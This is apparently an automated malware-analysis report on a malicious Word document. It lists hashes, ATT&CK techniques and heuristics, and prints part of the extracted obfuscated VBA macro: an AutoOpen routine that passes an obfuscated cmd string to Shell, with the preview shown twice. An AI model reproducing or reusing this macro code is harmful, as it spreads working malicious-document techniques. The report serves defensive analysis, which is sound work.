Office (OLE) malware analysis — malicious · 060659d9f4fc3dd1

MALICIOUS

Office (OLE)

88.1 KB Created: 2018-09-21 07:50:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: 129aaf254a4941b5204347677f28494f SHA-1: 8d771cfdeca7955e21e781f323bed819497d72f5 SHA-256: 060659d9f4fc3dd1a9590a7a254974c2f53fd366fbdd46f15c6ecee9f04354b6

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is a malicious Word document containing a legacy WordBasic AutoOpen macro. The AutoOpen macro is obfuscated and likely intended to download and execute a secondary payload. The presence of the AutoOpen macro and the VBA macros strongly suggests a spearphishing attachment attack vector.

Heuristics 4

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7584 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7584 bytes
SHA-256: `15b0d265b3b649fa21c1dd2d708b1e8e70fc26339791a7994784626d3f675080`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "IYmBjDjzCYKM" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim YOXziw() ReDim YOXziw(5) YOXziw(0) = "ihvHrcP" YOXziw(1) = Right(oRUYuz, 136) YOXziw(2) = "io" YOXziw(3) = MidB(EfAoiq, 526, 514) YOXziw(4) = Right(USZUool, 364) Dim TakjC() ReDim TakjC(3) TakjC(0) = MidB(noEwRIsK, 259, 831) TakjC(1) = Mid(hsRQQCjD, 424, 858) TakjC(2) = Left(jGNoH, 323) Dim mDaYG() ReDim mDaYG(2) mDaYG(0) = Mid(pYDkNTA, 906, 416) mDaYG(1) = Mid(DAErN, 162, 243) Dim Xvkzb() ReDim Xvkzb(4) Xvkzb(0) = Left(taPrwd, 870) Xvkzb(1) = MidB(LKOZTTX, 304, 403) Xvkzb(2) = "qDzYr" Xvkzb(3) = MidB(KzaoZzTa, 121, 660) Dim wztqC() ReDim wztqC(3) wztqC(0) = Left(bRLZOH, 943) wztqC(1) = Right(DZhwCXEd, 632) wztqC(2) = Mid(nEwkd, 28, 542) VzjhJzBTBo (KeyString(4 + 2 + 3 + 12 + 46) + hDCrGY + mkZtSmaPbIVvH + JXRVjbjzDE) Dim qoTlK() ReDim qoTlK(4) qoTlK(0) = Mid(bijQJf, 729, 317) qoTlK(1) = "ioFtSZz" qoTlK(2) = MidB(iRnOMF, 698, 422) qoTlK(3) = "FajbIWKVjrns" Dim jSDwLw() ReDim jSDwLw(2) jSDwLw(0) = Mid(umrXk, 389, 441) jSDwLw(1) = MidB(OdwuT, 487, 217) Dim sUaFw() ReDim sUaFw(4) sUaFw(0) = Left(zLVdz, 484) sUaFw(1) = Left(kKasWlFB, 745) sUaFw(2) = Mid(DwKmcrwB, 712, 361) sUaFw(3) = Left(bAwTT, 610) Dim aRuYmi() ReDim aRuYmi(5) aRuYmi(0) = Mid(XTfEv, 179, 141) aRuYmi(1) = MidB(XiLosD, 454, 52) aRuYmi(2) = Right(KROrwuMX, 729) aRuYmi(3) = "Yt" aRuYmi(4) = Left(mIEfA, 332) Dim PFVWX() ReDim PFVWX(3) PFVWX(0) = MidB(OWouCPGN, 406, 379) PFVWX(1) = Left(ZYSjJD, 673) PFVWX(2) = Mid(TrDkMDG, 261, 413) End Sub Function VzjhJzBTBo(rYVuOdJt As String) Dim CWSQz() ReDim CWSQz(5) CWSQz(0) = Mid(cOrjp, 183, 112) CWSQz(1) = Mid(XHnOVUZ, 545, 237) CWSQz(2) = Right(dJKcY, 52) CWSQz(3) = Mid(tJZoj, 609, 902) CWSQz(4) = "aOhKBdAVWbM" Dim rYnZK() ReDim rYnZK(4) rYnZK(0) = Right(mqrzp, 776) rYnZK(1) = "wAjpqbsav" rYnZK(2) = MidB(rRLcd, 770, 764) rYnZK(3) = Left(LWoBl, 733) Shell@ rYVuOdJt, CInt(msoBarTypeNormal) Dim CjsowD() ReDim CjsowD(3) CjsowD(0) = MidB(wWliiY, 700, 836) CjsowD(1) = Mid(IrDwA, 950, 608) CjsowD(2) = Right(WpuuMzS, 851) Dim MVpwpr() ReDim MVpwpr(4) MVpwpr(0) = Right(UGRfAELU, 103) MVpwpr(1) = Mid(ozzjFDI, 339, 127) MVpwpr(2) = MidB(XjYTp, 36, 785) MVpwpr(3) = Right(WQJCLJ, 608) Dim EWlia() ReDim EWlia(3) EWlia(0) = Left(SdshC, 137) EWlia(1) = Mid(hhiiQk, 651, 970) EWlia(2) = "wPnwoVmnpBOp" Dim IziPs() ReDim IziPs(3) IziPs(0) = "XhAphk" IziPs(1) = Left(nqwSvHz, 670) IziPs(2) = Right(BDwdR, 801) Dim uaTHk() ReDim uaTHk(4) uaTHk(0) = MidB(Mpzvnvd, 977, 120) uaTHk(1) = Mid(aizFSq, 138, 454) uaTHk(2) = MidB(wviROEh, 753, 720) uaTHk(3) = "HQdDNjcwMLnjD" End Function Attribute VB_Name = "UazdGpwUlREjcT" Function hDCrGY() Dim vrZANi() ReDim vrZANi(3) vrZANi(0) = Left(svpsnZFP, 196) vrZANi(1) = Mid(oRnnWtfm, 475, 845) vrZANi(2) = MidB(zBbjOZQ, 596, 908) Dim GpMcMv() ReDim GpMcMv(3) GpMcMv(0) = Left(QwUjh, 859) GpMcMv(1) = Right(foIquwhJ, 996) GpMcMv(2) = "riOF" Dim jPNQiB() ReDim jPNQiB(3) jPNQiB(0) = MidB(zOhwN, 816, 385) jPNQiB(1) = Right(zzwlaMUK, 567) jPNQiB(2) = "Hj" Dim XUhUH() ReDim XUhUH(5) XUhUH(0) = Mid(mkdYijAb, 40, 863) XUhUH(1) = Left(bfpzRm, 587) XUhUH(2) = "zpwlhhFjmzOzYl" XUhUH(3) = "CXMWUAIXLwL" XUhUH(4) = Right(auOFiCWK, 68) Dim XQaovR() ReDim XQaovR(3) XQaovR(0) = Left(PlLuD, 591) XQaovR(1) = Right(dPzlssH, 258) XQaovR(2) = Left(VjOniIw, 975) ClcHfp = "md /V:ON/C" + ChrW(5 + 0 + 5 + 4 + 20) + "^s^e^t ^p^" + "G= ^ ^ " + "^ ^ ^ ^ ^ " + " ^ ^" + " ^ ^ ^" + " }}{^hc^" + "tac};^k^a^" Dim DNLoRA() ReDim DNLoRA(3) DNLoRA(0) = Left(jMZwuf, 588) DNLoRA(1) = Left(CdjdnYf, 108) DNLoRA(2) = Mid(ALTSG, 491, 230) Dim rMEdFz() ReDim rMEdFz(4) rMEdFz(0) = MidB(PrhBmF, 129, 291) rMEd ... (truncated)

SHA-256: 15b0d265b3b649fa21c1dd2d708b1e8e70fc26339791a7994784626d3f675080

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "IYmBjDjzCYKM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim YOXziw()
ReDim YOXziw(5)
YOXziw(0) = "ihvHrcP"
YOXziw(1) = Right(oRUYuz, 136)
YOXziw(2) = "io"
YOXziw(3) = MidB(EfAoiq, 526, 514)
YOXziw(4) = Right(USZUool, 364)

   Dim TakjC()
ReDim TakjC(3)
TakjC(0) = MidB(noEwRIsK, 259, 831)
TakjC(1) = Mid(hsRQQCjD, 424, 858)
TakjC(2) = Left(jGNoH, 323)

   Dim mDaYG()
ReDim mDaYG(2)
mDaYG(0) = Mid(pYDkNTA, 906, 416)
mDaYG(1) = Mid(DAErN, 162, 243)

   Dim Xvkzb()
ReDim Xvkzb(4)
Xvkzb(0) = Left(taPrwd, 870)
Xvkzb(1) = MidB(LKOZTTX, 304, 403)
Xvkzb(2) = "qDzYr"
Xvkzb(3) = MidB(KzaoZzTa, 121, 660)

   Dim wztqC()
ReDim wztqC(3)
wztqC(0) = Left(bRLZOH, 943)
wztqC(1) = Right(DZhwCXEd, 632)
wztqC(2) = Mid(nEwkd, 28, 542)

VzjhJzBTBo (KeyString(4 + 2 + 3 + 12 + 46) + hDCrGY + mkZtSmaPbIVvH + JXRVjbjzDE)
   Dim qoTlK()
ReDim qoTlK(4)
qoTlK(0) = Mid(bijQJf, 729, 317)
qoTlK(1) = "ioFtSZz"
qoTlK(2) = MidB(iRnOMF, 698, 422)
qoTlK(3) = "FajbIWKVjrns"

   Dim jSDwLw()
ReDim jSDwLw(2)
jSDwLw(0) = Mid(umrXk, 389, 441)
jSDwLw(1) = MidB(OdwuT, 487, 217)

   Dim sUaFw()
ReDim sUaFw(4)
sUaFw(0) = Left(zLVdz, 484)
sUaFw(1) = Left(kKasWlFB, 745)
sUaFw(2) = Mid(DwKmcrwB, 712, 361)
sUaFw(3) = Left(bAwTT, 610)

   Dim aRuYmi()
ReDim aRuYmi(5)
aRuYmi(0) = Mid(XTfEv, 179, 141)
aRuYmi(1) = MidB(XiLosD, 454, 52)
aRuYmi(2) = Right(KROrwuMX, 729)
aRuYmi(3) = "Yt"
aRuYmi(4) = Left(mIEfA, 332)

   Dim PFVWX()
ReDim PFVWX(3)
PFVWX(0) = MidB(OWouCPGN, 406, 379)
PFVWX(1) = Left(ZYSjJD, 673)
PFVWX(2) = Mid(TrDkMDG, 261, 413)

End Sub
Function VzjhJzBTBo(rYVuOdJt As String)
   Dim CWSQz()
ReDim CWSQz(5)
CWSQz(0) = Mid(cOrjp, 183, 112)
CWSQz(1) = Mid(XHnOVUZ, 545, 237)
CWSQz(2) = Right(dJKcY, 52)
CWSQz(3) = Mid(tJZoj, 609, 902)
CWSQz(4) = "aOhKBdAVWbM"

   Dim rYnZK()
ReDim rYnZK(4)
rYnZK(0) = Right(mqrzp, 776)
rYnZK(1) = "wAjpqbsav"
rYnZK(2) = MidB(rRLcd, 770, 764)
rYnZK(3) = Left(LWoBl, 733)

Shell@ rYVuOdJt, CInt(msoBarTypeNormal)
   Dim CjsowD()
ReDim CjsowD(3)
CjsowD(0) = MidB(wWliiY, 700, 836)
CjsowD(1) = Mid(IrDwA, 950, 608)
CjsowD(2) = Right(WpuuMzS, 851)

   Dim MVpwpr()
ReDim MVpwpr(4)
MVpwpr(0) = Right(UGRfAELU, 103)
MVpwpr(1) = Mid(ozzjFDI, 339, 127)
MVpwpr(2) = MidB(XjYTp, 36, 785)
MVpwpr(3) = Right(WQJCLJ, 608)

   Dim EWlia()
ReDim EWlia(3)
EWlia(0) = Left(SdshC, 137)
EWlia(1) = Mid(hhiiQk, 651, 970)
EWlia(2) = "wPnwoVmnpBOp"

   Dim IziPs()
ReDim IziPs(3)
IziPs(0) = "XhAphk"
IziPs(1) = Left(nqwSvHz, 670)
IziPs(2) = Right(BDwdR, 801)

   Dim uaTHk()
ReDim uaTHk(4)
uaTHk(0) = MidB(Mpzvnvd, 977, 120)
uaTHk(1) = Mid(aizFSq, 138, 454)
uaTHk(2) = MidB(wviROEh, 753, 720)
uaTHk(3) = "HQdDNjcwMLnjD"

End Function

Attribute VB_Name = "UazdGpwUlREjcT"
Function hDCrGY()
Dim vrZANi()
ReDim vrZANi(3)
vrZANi(0) = Left(svpsnZFP, 196)
vrZANi(1) = Mid(oRnnWtfm, 475, 845)
vrZANi(2) = MidB(zBbjOZQ, 596, 908)

   Dim GpMcMv()
ReDim GpMcMv(3)
GpMcMv(0) = Left(QwUjh, 859)
GpMcMv(1) = Right(foIquwhJ, 996)
GpMcMv(2) = "riOF"

   Dim jPNQiB()
ReDim jPNQiB(3)
jPNQiB(0) = MidB(zOhwN, 816, 385)
jPNQiB(1) = Right(zzwlaMUK, 567)
jPNQiB(2) = "Hj"

   Dim XUhUH()
ReDim XUhUH(5)
XUhUH(0) = Mid(mkdYijAb, 40, 863)
XUhUH(1) = Left(bfpzRm, 587)
XUhUH(2) = "zpwlhhFjmzOzYl"
XUhUH(3) = "CXMWUAIXLwL"
XUhUH(4) = Right(auOFiCWK, 68)

   Dim XQaovR()
ReDim XQaovR(3)
XQaovR(0) = Left(PlLuD, 591)
XQaovR(1) = Right(dPzlssH, 258)
XQaovR(2) = Left(VjOniIw, 975)

ClcHfp = "md /V:ON/C" + ChrW(5 + 0 + 5 + 4 + 20) + "^s^e^t ^p^" + "G=  ^ ^ " + "^ ^ ^   ^ ^ " + " ^ ^" + " ^ ^ ^" + " }}{^hc^" + "tac};^k^a^"
Dim DNLoRA()
ReDim DNLoRA(3)
DNLoRA(0) = Left(jMZwuf, 588)
DNLoRA(1) = Left(CdjdnYf, 108)
DNLoRA(2) = Mid(ALTSG, 491, 230)

   Dim rMEdFz()
ReDim rMEdFz(4)
rMEdFz(0) = MidB(PrhBmF, 129, 291)
rMEd
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.